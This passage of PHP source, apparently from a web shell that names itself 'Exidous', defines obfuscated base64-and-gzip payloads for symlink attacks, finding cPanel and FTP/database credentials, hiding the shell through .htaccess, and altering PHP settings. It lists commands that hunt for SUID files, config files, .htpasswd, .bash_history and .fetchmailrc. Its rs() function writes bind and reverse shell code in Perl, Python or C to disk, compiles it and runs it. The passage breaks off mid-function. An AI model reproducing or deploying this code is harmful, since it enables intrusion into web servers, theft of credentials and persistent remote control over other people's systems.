  133. 7FfcYoIq0uPlT9x7qc4tRMQFa+grdtDcgza34lUBi6aESM9JxtvsbmUXJvA55TjO1yEue0IRevoyhADeb7t+MBDeQx+gefCvIggTaDpJk/iAE0KF1nmZUtJxjSJWu8jS+wwD7liaoRdD3Ci4DoMglRiRY3ThX724
  134. jwAyXryYVu7XhNjFlsnYFfOmD28btl0aIjldGalaQKT/u4HUOF81ktfBFVhXx3Fyv20GLdYvBTfX8Nw==";
  135.  
  136. $Symlink = "tVZtb9s2EP6cAPkPtGBUMupK+dACQ1w32FIHCRAsWeL2SxIIlERZXChSI6kpRuD/viMlv8Wy4A2YYFjU3XMP747HI7+eF1lxcnwUBOi74K5GSmOpUUV1hjBSDKus1+sBAH59nZGESjRGM6LjKvEGaHRyTFPkKS0LobwGMHQznTN3gHrjMUoxU2SA3k6OETz9uFRa5DWLY2AOUCzaWSoSHUACqC6OqjqEo6o6ODKdiFgdFI8BdjLp4mCuGtrBVpQRo3F4YLI30A3nUb/ASlUJaFNREO45AaxrUAudIXKkMxg1S7+iClWMOSeGEuRYSjz3YHDkBH9HAeUxKxOigljwlM58qC1nWGs7VLuSVMgy7zKxANWFwElOuZW3S7fRVfFpVxgxMWvXGEk4YyLCrCXGIIlq6dFmfKXEmgreht+d4E8hcob3W1ZZ3qmM92tVWRRC6v2ATChN+Ww/4IFoA1C7K7ZXozqM9iSzsdujNTGq/S5GlLHOGGJGCe9Iwtq11sLrqG/115ajjEYtaCNdVkkt2f5SmShazJIIZJzE+p2w1RHK6RrXbGT4o6nXazb+AD7fjFVCiedcYNP/TSNAG33AR1MiYdNgs3p+3RAWNVOVUUa8XkpE6i0ZV5R9yD8xnQXOCrVUD9Hn08+/WI5l8wkbHHktmEiI5565Q2SNa5iFpoIltuVsGj1+ea6JSrWrO31eWcPRdpEJoQjMQeIhUnOlSY6ERMZAZ1KUs8wAITNUKaK9Zr4B+vAB9Uhe6PmWqAGZabcgVmASUGegnpjELygTuenYVtiPRZ5jbpquwzj6pFBDHWy0a0vljGoDUeqi1DZFxFuaLxvzxiyqIDFNaYxSWBZV21IwO615oHIJjjOvpZVj4wQYWd8b58H248dRM9zx+cnZ9TqwHE8OKMMwfLMxLMI+9fWrfnKcJdf+cI6OzKFk/xZ1dGnMYN1WxTWyZdfP9PrE8jON45goZc6rqi7PtJJUg1WmQXZbmK2t0DVPYEKFLgVjonqY5zeUv6gn3mLynUrYYkLOrQ16yTCHafJW7K9JMp0XBEGMyGy2faArCJJBqndwTYSZbqIrOdTvixeGl9c3kzA00kJSrpH7NScao6vp9O7T5I8f1z/Hzv3k8n7ycOUg6Aoa2tnYOR2hUrKx65sr2m9YkR+SeQPfdb65QJSWPDbZ2FKeHK+vC1ICyx2Gux9sp/Bhcv9zcv/o3l3dwfjm0jV7ymwznV3zVADGDCkMvU1b4zKyhOYk+R3nZIvNBBBe3T5MazoLLKTQIhYMgHDJ0QJWiEhPlRF8eStTp36Hd/e309uL2xvneXg6/DIYjMf2YqXOgsA9Xw/P7NCMlvNIokvJ19P5Kw/9VVSPLpQyB5H77CPX2ppiXKWurtpBkzNoGUtNSF6pglbn1v3FHazuYeYRUWhv1t4qO/DUSEO3IexHkAWAwxqFzbqqLSvQEZ6EMSOYbymW4UWNbFG/CNwJW/3MCGOh6Yng69s7B9bKd+79y0ka+s1UNKTDvtwJ23aJpWTVsOoGpTZ9bCx8KCy1YbL4z342R0F5yLItsf/3wjViSAqCJp9i6K6J7/tIZCif27I8//YP";
  137.  
  138. $SQLMan = "";
  139.  
  140. $ShellFinder = "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";
  141.  
  142. $CpanelFinder = "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";
  143.  
  144. $CpFtpDbFinder = "nVbbbts4EH034H+gVQGSG0dyWhQFktBtsU2AAkHR3fStCQRZoiKiNqklqVXTYvfbd3jRxYlsGPUFtmbODOdyOOTlu6qsphOSlRx5l6XablbeRfesqNqQ1e2fN+iPLx8+X92g669f0PWnzx+v/rqMrfJyzfNHY4OmE0lUouiWJBu6pSpczkH84tlrOnnvV6mUTY4LXhEWBjFRWWxFwSIQgbajBQpnDjdHv9qYvp3eoyshuEDnKON1zgKFBElzNPBhMvhBFfz8O53EMSPNdOKrkuRUIIweANnk4Ry5VaQSFZehAywCXYVgjmYYoyLdSGJWR/Dys1oqvrVePA3z7BJjXhqyPsIJoA75aJpjfDTNAR+lynkmj8pHAw96UtXRviz0gLeqXm9olhxZ7AHa+dTvOCYsh9ZWqSoTxROLwqkQ6WOoSeTXkgg5FGio4hlnxVBK8dIyuCnphoSzgvAibMlnQvIhflwAdWQnd/Tx6er1G4uBBHGbJ/wuvHOvi4KlW4JlvQa5VS4XGm/0kORP7MUl35K4A8d9BWLPrRV22hn2PBuZllOZ6E2QriF4482qTIZQFVlaQ7no7PW6Q/VuCRfWia20/fj05MQ+P9/RL0ztRuSt1s2TtVjp73DCkB8qhdCRKU+wTSlLGspy3gSwvTcSny2XSPBG4lfLdsq4QXByj655zXLkRZL+NA0zOc4jDxGmxKNElA3Hwh3rFx6z3i2BdtPWdEhG+JJMcUGJtA77iP67R7ckFVlJ2QMqYESZdbnITSSac/QheokKoJiMouiOWQeAJGlWIhc/SiUy/xynIKodbjzlhQ4ygQebgO2w61wX2h3TCX/kjHQxFzXLFOUMjdkbhrTk8suU5VAEjPS07pCWYmbDoNDsXbOLQ1/nB2Dt14Ct+dzto8ImZFwYaM9t/TTDQQTzAExQLwDJONWLPhA/F+DVCLrtAlgTQS4spk81F7tbAYpFdAa/hrFgHLimwSEJQUFHnyooy0aU+XqPAqwYsGdE01Sne9f6JxV7I6gFGQ9gv0Gq2z5qlOzE1/JPSgxzL9F/2oq3o0/LoEHB8IAGolnUHTN6R3JVJVlJsu/9CFsY9c6QefIZ0rQPYUPZd7Pge9+m5K4RRtFeH3YGuYW5hABF2knuFP1FwExnjYADChazFXou15t6ry4fsBV09jiweg9UbU3bs8BouuPR4nAwP3k9X4yYn44i5zoFTeDfd+4F3iHngqhaMGS8X+xp0aDHG/5AmWuwbRUosQFYioXB2au30RLeZ911T2McWhBp0MaPUSx2fLYWgOu5F3yD++k9CiILjYJz+KvhMMrRbZ1lpGVju931En/XcFU1S18MknLnU9weUN3BhWqmeRYmyfWnm6sk0VbvVv8D";
  145.  
  146. $HtaccessFWB = "s/FM881PKc1JVcjNT4kvTk0uLcosqdRLtuPlCk5NdsvMKUktcs1Lz8xLVfBPS0MSDE5OzAvwDw6BCNvow8yxAwA=";
  147.  
  148. $HtaccessHideShell = "RU47iwIxEO4D+Q9DlFPBB9oqKxarFgsW2umdxCRLgnETkux5Nv52Z3XhpplvvhfTgd2vCsFIBVKVvLYJd/WAUFsFycGNXxWMdeJCqBihNEh/sLkgdBiGu7pQslijFOEJ7OeEfpZRsgsSVW6tuw+bUkpWDYYyuFtDY2jyTqF3JeXh4bHbe2sET8ZVk7+RTsnLkdf+/wVKKOm8B/bbvCigPRbLxqaEdsBOFZt7HmPSoe53z5v8cOyJ3veYwSz7mrLBHJZZGyuKfLtvO14=";
  149.  
  150. $PyHttp = "dY/NboMwEITvSLzDlhwANTIJuSFx6iWnqmq4W/xsglXwUtuBtk9fbBERpaov9o49M583T8lVq6QSMkE5wvBtWpK+t4EGR9H91LsGGakLRHUM6W6f+p7oB1IGTvPe4bEo3k6oRlTrBdUfaB5E0r7ne+6Yw/6wTw92FmfgXJY9cp7nIed9KSTnYeZ7sCzSrG4boaIwCeNVPpay6VDNWY8YbBXe8fOK2ixvbd/N3hozNNZ8h8qKlyUiioJgC5Y13t6a4nv7oIQ0UfBKE9CAEkwrNGjnBZIwYVUpmmYBSuNyIIMAnkEbFbnY+E8WfpUWO3NoWZL0ZUuspj77z+e+wFwpP5NCyx3/Ag==";
  151.  
  152. $INIPHP = "s7Hn5UpNzshXyMzLjE9PLdFQKk5MS43PzU9JVdK0RpfLL0jNi09KLE5NySwCS2fmJeeUpqRqqMS7u4YUJ+YVlxYhk5aG1kppmTmpSlikjK0hBmTGF6UWl+QXpaJbjSKFYTNtHV1cjNvJ9nYA";
  153.  
  154. $PHPINI = "K05MS43PzU9JVbBVyE9L4+VKrUhNBrL983i5ijNSc3Li4QIA";
  155.  
  156. $cmdaliases = array(
  157. array("-----------------------------------------------------------", "ls -la"),
  158. array("find all suid files", "find_/_-type_f_-perm_-04000_-ls"),
  159. array("find suid files in current dir", "find_._-type_f_-perm_-04000_-ls"),
  160. array("find all sgid files", "find_/_-type_f_-perm_-02000_-ls"),
  161. array("find sgid files in current dir", "find_._-type_f_-perm_-02000_-ls"),
  162. array("find config.inc.php files", "find_/_-type_f_-name_config.inc.php"),
  163. array("find config* files", "find_/_-type_f_-name_config*"),
  164. array("find config* files in current dir", "find_._-type_f_-name_config*"),
  165. array("find all writable folders and files", "find_/_-perm_-2_-ls"),
  166. array("find all writable folders and files in current dir", "find_._-perm_-2_-ls"),
  167. array("find all service.pwd files", "find_/_-type_f_-name_service.pwd"),
  168. array("find service.pwd files in current dir", "find_._-type_f_-name_service.pwd"),
  169. array("find all .htpasswd files", "find_/_-type_f_-name_.htpasswd"),
  170. array("find .htpasswd files in current dir", "find_._-type_f_-name_.htpasswd"),
  171. array("find all .bash_history files", "find_/_-type_f_-name_.bash_history"),
  172. array("find .bash_history files in current dir", "find_._-type_f_-name_.bash_history"),
  173. array("find all .fetchmailrc files", "find_/_-type_f_-name_.fetchmailrc"),
  174. array("find .fetchmailrc files in current dir", "find_._-type_f_-name_.fetchmailrc"),
  175. array("list file attributes on a Linux second extended file system", "lsattr_-va"),
  176. array("show opened ports", "netstat_-an_|_grep_-i_listen")
  177. );
  178.  
  179. // make link for folder $pwd and all of its parent folder
  180. function swd($p){
  181. $ps = explode(DIRECTORY_SEPARATOR,$p);
  182. $pu = "";
  183. for($i = 0 ; $i < sizeof($ps)-1 ; $i++){
  184. $pz = "";
  185. for($j = 0 ; $j <= $i ; $j++) $pz .= $ps[$j].DIRECTORY_SEPARATOR;
  186. $pu .= "<a href=\"?d=".$pz."\">".$ps[$i]." ".DIRECTORY_SEPARATOR." </a>";
  187. }
  188. return trim($pu);
  189. }
  190. // remove <br />tags
  191. function rp($t){
  192. return trim(str_replace("<br />","",$t));
  193. }
  194. // replace spaces with underscore ( _ )
  195. function cs($t){
  196. return str_replace(" ","_",$t);
  197. }
  198. // strip slashes,trim and urldecode
  199. function ss($t){
  200. if (!get_magic_quotes_gpc()) return trim(urldecode($t));
  201. return trim(urldecode(stripslashes($t)));
  202. }
  203. // only strip slashes
  204. function ssc($t){
  205. if (!get_magic_quotes_gpc()) return $t;
  206. return stripslashes($t);
  207. }
  208. // bind and reverse shell
  209. function rs($s_win, $d, $type, $sc, $target){
  210. $result = "";
  211.  
  212. $fc = gzinflate(base64_decode($sc));
  213.  
  214. $errperm = "<p class=\"rs_result\">error: permission denied. check current working directory permissions</p>";
  215. $errgcc = "<p class=\"rs_result\">error: can not compile using gcc</p>";
  216.  
  217. if($type == "xbind_pl"){
  218. $fname = "Exidous_bind.pl";
  219. $fpath = $d.$fname;
  220. if(is_file($fpath)) unlink($fpath);
  221. if($file=fopen($fpath,"w")){
  222. fwrite($file,$fc);
  223. fclose($file);
  224. if(is_file($fpath)){
  225. $res = exe("chmod +x ".$fpath);
  226. $res = exe("perl ".$fpath." ".$target);
  227. }
  228. else $result = $errperm;
  229. }
  230. else $result = $errperm;
  231. }
  232. elseif($type == "xbind_py"){
  233. $fname = "Exidous_bind.py";
  234. $fpath = $d.$fname;
  235. if(is_file($fpath)) unlink($fpath);
  236. if($file=fopen($fpath,"w")){
  237. fwrite($file,$fc);
  238. fclose($file);
  239. if(is_file($fpath)){
  240. $res = exe("chmod +x ".$fpath);
  241. $res = exe("python ".$fpath." ".$target);
  242. }
  243. else $result = $errperm;
  244. }
  245. else $result = $errperm;
  246.  
  247. }
  248. elseif($type == "xbind_bin"){
  249. $fname = "Exidous_bind";
  250. $fpath = $d.$fname;
  251.  
  252. if(!$s_win){
  253. if(is_file($fpath)) unlink($fpath);
  254. if(is_file($fpath.".c")) unlink($fpath.".c");
  255. if($file=fopen($fpath.".c","w")){
  256. fwrite($file,$fc);
  257. fclose($file);
  258. if(is_file($fpath.".c")){
  259. $res = exe("gcc ".$fpath.".c -o ".$fpath);
  260. if(is_file($fpath)){
  261. $res = exe("chmod +x ".$fpath);
  262. $res = exe($fpath." ".$target);
  263. }
  264. else $result = $errgcc;
  265. }
  266. else $result = $errperm;
  267.  
  268. }
  269. else $result = $errperm;
  270. }
  271. else{
  272. $fpath = $fpath . ".exe";
  273. if(is_file($fpath)) unlink($fpath);
